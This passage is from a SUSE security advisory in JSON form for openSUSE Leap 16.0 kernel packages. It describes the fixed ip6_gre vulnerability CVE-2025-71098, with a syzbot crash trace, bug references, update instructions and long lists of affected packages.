"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
